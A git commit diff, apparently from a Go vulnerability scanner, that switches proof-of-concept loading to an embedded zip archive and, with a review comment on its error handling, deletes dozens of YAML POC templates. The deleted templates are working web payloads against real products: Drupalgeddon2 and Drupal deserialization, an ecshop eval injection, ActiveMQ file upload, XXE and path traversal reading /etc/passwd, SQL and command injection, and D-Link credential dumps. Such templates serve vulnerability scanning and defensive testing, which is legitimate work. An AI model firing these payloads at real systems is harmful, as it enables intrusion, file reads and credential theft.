修改pocs加载为zip压缩包

This commit is contained in:
LAPTOP-VVINFKMQ\JohnDoe 2021-07-26 11:15:39 +08:00
parent dc949e25b1
commit 7095bd20be
151 changed files with 169 additions and 2412 deletions


@ -4,10 +4,14 @@
package lib
import (
"bytes"
"archive/zip"
"embed"
fmt "fmt"
proto "github.com/golang/protobuf/proto"
"gopkg.in/yaml.v3"
"io/ioutil"
"log"
math "math"
"strings"
)
@ -393,7 +397,28 @@ func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
p := &Poc{}
yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
zByte, err := Pocs.ReadFile("pocs/pocs.zip")
zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
if err != nil {
log.Fatal(err)
}
var unzippedFileBytes []byte
// Read all the files from zip archive
for _, zipFile := range zipReader.File {
if zipFile.Name == fileName {
unzippedFileBytes, err = readZipFile(zipFile)
if err != nil {
log.Println(err)
continue
}
break
}
}
yamlFile := unzippedFileBytes
//yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
if err != nil {
return nil, err
@ -406,6 +431,23 @@ func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
}
func SelectPoc(Pocs embed.FS, pocname string) []string {
zByte, err := Pocs.ReadFile("pocs/pocs.zip")
zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
if err != nil {
log.Fatal(err)
}
var foundFiles []string
// Read all the files from zip archive
for _, entry := range zipReader.File {
if strings.Contains(entry.Name, pocname){
foundFiles = append(foundFiles, entry.Name)
}
}
/*
entries, err := Pocs.ReadDir("pocs")
if err != nil {
fmt.Println(err)
@ -416,5 +458,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string {
foundFiles = append(foundFiles, entry.Name())
}
}
*/
return foundFiles
}
func readZipFile(zf *zip.File) ([]byte, error) {
f, err := zf.Open()
if err != nil {
return nil, err
}
defer f.Close()
return ioutil.ReadAll(f)
}
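Review bot: In the new loadPoc body, when no entry named fileName exists in pocs/pocs.zip the loop leaves unzippedFileBytes nil while err still holds the nil result of zip.NewReader, so the `if err != nil` check after `yamlFile := unzippedFileBytes` passes and the function returns an empty Poc with no error; add after the loop `if err == nil && unzippedFileBytes == nil {` / `return nil, fmt.Errorf("poc %q not found in pocs/pocs.zip", fileName)` / `}`. The error from `Pocs.ReadFile("pocs/pocs.zip")` is overwritten by the `zip.NewReader` call on the next line without being checked, and the remaining failure is handled with `log.Fatal` inside a function that already returns an error — returning `fmt.Errorf("opening pocs/pocs.zip: %w", err)` keeps the caller in control; SelectPoc repeats the same unchecked-read-then-Fatal pattern. Each loadPoc call re-reads and re-parses the whole embedded archive, so LoadMultiPoc callers presumably pay that cost once per POC; opening the zip once and passing the *zip.Reader in would avoid it. readZipFile uses ioutil.ReadAll, which is deprecated in favor of io.ReadAll. loadPoc's body continues past the end of this hunk.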


@ -1,34 +0,0 @@
name: poc-yaml-activemq-cve-2016-3088
set:
filename: randomLowercase(6)
fileContent: randomLowercase(6)
rules:
- method: PUT
path: /fileserver/{(unknown)}.txt
body: |
{{fileContent}}
expression: |
response.status == 204
- method: GET
path: /admin/test/index.jsp
search: |
activemq.home=(?P<home>.*?),
follow_redirects: false
expression: |
response.status == 200
- method: MOVE
path: /fileserver/{(unknown)}.txt
headers:
Destination: "file://{{home}}/webapps/api/{(unknown)}.jsp"
follow_redirects: false
expression: |
response.status == 204
- method: GET
path: /api/{(unknown)}.jsp
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(fileContent))
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088


@ -1,16 +0,0 @@
name: poc-yaml-activemq-default-password
rules:
- method: GET
path: /admin/
expression: |
response.status == 401 && response.body.bcontains(b"Unauthorized")
- method: GET
path: /admin/
headers:
Authorization: Basic YWRtaW46YWRtaW4=
expression: |
response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
links:
- https://blog.csdn.net/ge00111/article/details/72765210


@ -1,12 +0,0 @@
name: poc-yaml-alibaba-canal-info-leak
rules:
- method: GET
path: /api/v1/canal/config/1/1
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
detail:
author: Aquilao(https://github.com/Aquilao)
info: alibaba Canal info leak
links:
- https://my.oschina.net/u/4581879/blog/4753320


@ -1,15 +0,0 @@
name: poc-yaml-alibaba-nacos-api-unauth
rules:
- method: GET
path: /nacos/v1/auth/users?pageNo=1&pageSize=9
headers:
User-Agent: Nacos-Server
follow_redirects: true
expression: |
response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
detail:
author: AgeloVito
info: alibaba-nacos-api-unauth
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424


@ -1,13 +0,0 @@
name: poc-yaml-alibaba-nacos
rules:
- method: GET
path: /nacos/
follow_redirects: true
expression: |
response.body.bcontains(bytes("<title>Nacos</title>"))
detail:
author: AgeloVito
info: alibaba-nacos
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424


@ -1,38 +0,0 @@
name: poc-yaml-apache-flink-upload-rce
set:
r1: randomLowercase(8)
r2: randomLowercase(4)
rules:
- method: GET
path: /jars
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"address") && response.body.bcontains(b"files")
- method: POST
path: /jars/upload
headers:
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
body: |-
--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar"
Content-Type:application/octet-stream
{{r1}}
--8ce4b16b22b58894aa86c421e8759df3--
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
search: >-
(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
- method: DELETE
path: '/jars/{{filen}}'
follow_redirects: true
expression: |
response.status == 200
detail:
author: timwhite
links:
- https://github.com/LandGrey/flink-unauth-rce


@ -1,19 +0,0 @@
name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization
set:
rand: randomInt(200000000, 210000000)
rules:
- method: POST
path: /webtools/control/xmlrpc
headers:
Content-Type: application/xml
body: >-
<?xml
version="1.0"?><methodCall><methodName>{{rand}}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
detail:
author: su(https://suzzz112113.github.io/#blog)
links:
- https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb


@ -1,21 +0,0 @@
name: poc-yaml-apache-solr-file-read
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
search: |
"name":"(?P<core_name>.+?)",
expression:
response.status == 200
- method: POST
path: "/solr/{{core_name}}/config"
headers:
Content-type: application/json
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.status == 200 && response.body.bcontains(b"This")
detail:
author: flyinbed
links:
- "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg"
- "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ"


@ -1,15 +0,0 @@
name: poc-yaml-apacheofbiz-cve-2018-8033-xxe
rules:
- method: POST
path: /webtools/control/xmlrpc
headers:
Content-Type: application/xml
body: >-
<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
follow_redirects: false
expression: >
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml")
detail:
author: su(https://suzzz112113.github.io/#blog)
links:
- https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py


@ -1,11 +0,0 @@
name: poc-yaml-bt742-pma-unauthorized-access
rules:
- method: GET
path: /pma/
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php")
detail:
author: Facker007(https://github.com/Facker007)
links:
- https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A


@ -1,11 +0,0 @@
name: poc-yaml-cisco-cve-2020-3452-readfile
rules:
- method: GET
path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
follow_redirects: false
expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
detail:
author: JrD (https://github.com/JrDw0/)
links:
- https://nvd.nist.gov/vuln/detail/CVE-2020-3452
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86


@ -1,12 +0,0 @@
name: poc-yaml-coremail-cnvd-2019-16798
rules:
- method: GET
path: >-
/mailsms/s?func=ADMIN:appState&dumpConfig=/
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(bytes("<object name=\"cm_md_db\">"))
detail:
author: cc_ci(https://github.com/cc8ci)
links:
- https://www.secpulse.com/archives/107611.html


@ -1,22 +0,0 @@
name: poc-yaml-discuz-ml3x-cnvd-2019-22239
set:
r1: randomInt(800000000, 1000000000)
rules:
- method: GET
path: /forum.php
follow_redirects: false
expression: |
response.status == 200
search: cookiepre = '(?P<token>[\w_]+)'
- method: GET
path: /forum.php
headers:
Cookie: "{{token}}language=sc'.print(md5({{r1}})).'"
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
detail:
author: X.Yang
Discuz_version: Discuz!ML 3.x
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239


@ -1,14 +0,0 @@
name: poc-yaml-dlink-cve-2019-17506
rules:
- method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
detail:
author: l1nk3r,Huasir(https://github.com/dahua966/)
links:
- https://xz.aliyun.com/t/6453


@ -1,12 +0,0 @@
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
- method: GET
path: >-
/config/getuser?index=0
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg


@ -1,15 +0,0 @@
name: poc-yaml-dlink-cve-2020-9376-dump-credentials
rules:
- method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
expression: >
response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
detail:
author: x1n9Qi8
Affected Version: "Dlink DIR-610"
links:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376


@ -1,9 +0,0 @@
name: poc-yaml-dlink-dcs-info-leak
rules:
- method: GET
path: /config/getuser?index=0
expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=")
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw


@ -1,12 +0,0 @@
name: poc-yaml-docker-api-unauthorized-rce
rules:
- method: GET
path: /info
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce


@ -1,16 +0,0 @@
name: poc-yaml-docker-registry-api-unauth
rules:
- method: GET
path: /v2/
follow_redirects: false
expression: >
response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0")
- method: GET
path: /v2/_catalog
follow_redirects: false
expression: >
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories")
detail:
author: p0wd3r
links:
- http://www.polaris-lab.com/index.php/archives/253/


@ -1,10 +0,0 @@
name: poc-yaml-druid-monitor-unauth
rules:
- method: GET
path: /druid/index.html
expression: |
response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
detail:
author: met7or
links:
- https://github.com/alibaba/druid


@ -1,14 +0,0 @@
name: poc-yaml-drupal-cve-2014-3704-sqli
rules:
- method: POST
path: /?q=node&destination=node
body: >-
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
follow_redirects: false
expression: |
response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
detail:
Affected Version: "Drupal < 7.32"
links:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704


@ -1,19 +0,0 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/


@ -1,29 +0,0 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/


@ -1,33 +0,0 @@
name: poc-yaml-drupal-cve-2019-6340
set:
host: request.url.host
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: /node/?_format=hal_json
headers:
Content-Type: application/hal+json
Accept: '*/*'
body: |
{
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links": {
"type": {
"href": "http://{{host}}/rest/type/shortcut/default"
}
}
}
follow_redirects: true
expression: |
response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: thatqier
links:
- https://github.com/jas502n/CVE-2019-6340
- https://github.com/knqyf263/CVE-2019-6340


@ -1,28 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 7
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/


@ -1,20 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 8
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/


@ -1,13 +0,0 @@
name: poc-yaml-ecology-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20md5({{rand}})%20as%20id%20from%20HrmResourceManager
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://github.com/whami-root


@ -1,17 +0,0 @@
name: poc-yaml-ecology-validate-sqli
set:
r1: randomInt(8000, 9999)
r2: randomInt(800, 1000)
rules:
- method: POST
path: /cpt/manage/validate.jsp?sourcestring=validateNum
body: >-
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%
0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: fuping
links:
- https://news.ssssafe.com/archives/3325
- https://www.weaver.com.cn/cs/securityDownload.asp




@ -1,13 +0,0 @@
name: poc-yaml-ecshop-cnvd-2020-58823-sqli
set:
r1: randomInt(40000, 44800)
rules:
- method: POST
path: /delete_cart_goods.php
body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
expression: |
response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw


@ -1,17 +0,0 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md


@ -1,17 +0,0 @@
name: poc-yaml-ecshop-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /user.php
headers:
Referer: >-
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
Content-Type: application/x-www-form-urlencoded
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md


@ -1,16 +0,0 @@
name: poc-yaml-elasticsearch-unauth
rules:
- method: GET
path: /
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search")
- method: GET
path: /_cat
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"/_cat/master")
detail:
author: p0wd3r
links:
- https://yq.aliyun.com/articles/616757


@ -1,14 +0,0 @@
name: poc-yaml-exchange-cve-2021-26855-ssrf
rules:
- method: GET
path: /owa/auth/x.js
headers:
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
follow_redirects: false
expression: |
"X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
detail:
author: sharecast
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
links:
- https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse


@ -1,15 +0,0 @@
name: poc-yaml-eyou-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /webadm/?q=moni_detail.do&action=gragh
headers:
Content-Type: application/x-www-form-urlencoded
body: type='|expr {{r1}} + {{r2}}||'
expression: response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g


@ -1,16 +0,0 @@
name: poc-yaml-f5-tmui-cve-2020-5902-rce
rules:
- method: POST
path: >-
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
headers:
Content-Type: application/x-www-form-urlencoded
body: fileName=%2Fetc%2Ff5-release
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"BIG-IP release")
detail:
author: Jing Ling
links:
- https://support.f5.com/csp/article/K52145254
- https://github.com/rapid7/metasploit-framework/pull/13807/files


@ -1,13 +0,0 @@
name: poc-yaml-fangweicms-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: Rexus
Affected Version: "4.3"
links:
- http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/


@ -1,11 +0,0 @@
name: poc-yaml-finereport-v8-arbitrary-file-read
rules:
- method: GET
path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA")
detail:
author: Facker007(https://github.com/Facker007)
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8


@ -1,11 +0,0 @@
name: poc-yaml-flir-ax8-file-read
rules:
- method: GET
path: "/download.php?file=/etc/passwd"
follow_redirects: false
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Print1n(http://print1n.top)
links:
